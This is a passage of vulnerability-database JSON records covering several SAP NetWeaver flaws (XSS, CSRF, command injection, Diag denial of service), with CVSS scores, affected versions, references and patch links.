"db": "NVD",
"id": "CVE-2018-2434"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2633180"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/105088"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=497256000"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2434"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2434"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=499352742"
}
],
"sources": [
{
"db": "BID",
"id": "105088"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105088"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-14T00:00:00",
"db": "BID",
"id": "105088"
},
{
"date": "2018-10-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"date": "2018-07-10T18:29:00.967000",
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"date": "2018-07-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-14T00:00:00",
"db": "BID",
"id": "105088"
},
{
"date": "2018-10-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-008005"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-2434"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural SAP Vulnerability related to input validation in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-008005"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "data forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-921"
}
],
"trust": 0.6
}
}
var-201302-0013
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0013",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 6.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 4.5,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "4.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 sp15"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 sp8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-5260"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastuchin, Dmitriy Evdokimov, Alexandr Polyakov and Alexey Tyurin of Digital Security Research Group (DSecRG)",
"sources": [
{
"db": "BID",
"id": "50680"
}
],
"trust": 0.3
},
"cve": "CVE-2011-5260",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2011-5260",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-5260",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201302-162",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \\\"\u003cSTRING\u003e\\\" parameter. The \\\"instname\\\" parameter passed to the VsiTestScan servlet in the virus scanning interface and the input of the \\\"name\\\" parameter in the VsiTestServlet servlet are missing filtering before returning to the user, which can lead to cross-site scripting attacks. When using transaction \\\"sa38\\\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \\\"File Name\\\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user\u0027s browser when viewed maliciously. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
}
],
"trust": 5.67
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "50680",
"trust": 4.5
},
{
"db": "NVD",
"id": "CVE-2011-5260",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-4916",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4917",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4915",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4912",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4914",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4913",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2011-4911",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20111117 [DSECRG-11-037] SAP BW DOC - MULTIPLE XSS",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"id": "VAR-201302-0013",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
],
"trust": 4.6931946133333335
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 4.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
}
]
},
"last_update_date": "2023-12-18T12:21:49.292000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Archive for Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5913"
},
{
"title": "Patch for SAP NetWeaver Feature Access Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5922"
},
{
"title": "Patch for SAP NetWeaver Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5912"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5909"
},
{
"title": "Patch for SAP NetWeaver Path Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5911"
},
{
"title": "Patch for SAP NetWeaver \u0027page\u0027 parameter cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5910"
},
{
"title": "SAP Netweaver Script Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5908"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=341"
},
{
"trust": 0.9,
"url": "http://dsecrg.com/pages/vul/show.php?id=335"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-5260"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-5260"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=340http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=339http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=336http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=338http"
},
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=337http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/520555/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=336"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=339"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=340"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=338"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"db": "BID",
"id": "50680"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2011-11-15T00:00:00",
"db": "BID",
"id": "50680"
},
{
"date": "2013-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"date": "2013-02-12T20:55:03.653000",
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4916"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4917"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4915"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4914"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4913"
},
{
"date": "2011-11-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-4911"
},
{
"date": "2013-02-14T12:21:00",
"db": "BID",
"id": "50680"
},
{
"date": "2013-02-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-001560"
},
{
"date": "2018-12-10T19:29:00.717000",
"db": "NVD",
"id": "CVE-2011-5260"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-4912"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-162"
}
],
"trust": 0.6
}
}
var-201205-0128
Vulnerability from variot
The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0128",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
